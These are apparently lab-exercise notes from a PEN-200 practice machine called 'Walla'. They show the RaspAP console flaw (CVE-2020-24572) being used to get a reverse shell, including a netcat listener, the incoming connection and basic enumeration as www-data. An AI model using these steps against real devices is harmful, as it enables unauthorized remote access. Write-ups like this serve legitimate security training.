RaspAP
A console is available under the System tab; CVE-2020-24572
/Practice/Walla/3-Exploitation/attachments/{92432282-031B-4977-92DD-7381FE0D5C00}.png)
Sending a reverse shell command
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/walla]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.179.97] 35294
bash: cannot set terminal process group (652): Inappropriate ioctl for device
bash: no job control in this shell
www-data@walla:/var/www/html/includes$ whoami
whoami
www-data
www-data@walla:/var/www/html/includes$ hostname
hostname
walla
www-data@walla:/var/www/html/includes$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:3b:71 brd ff:ff:ff:ff:ff:ff
inet 192.168.179.97/24 brd 192.168.179.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the www-data account via the RaspAP web interface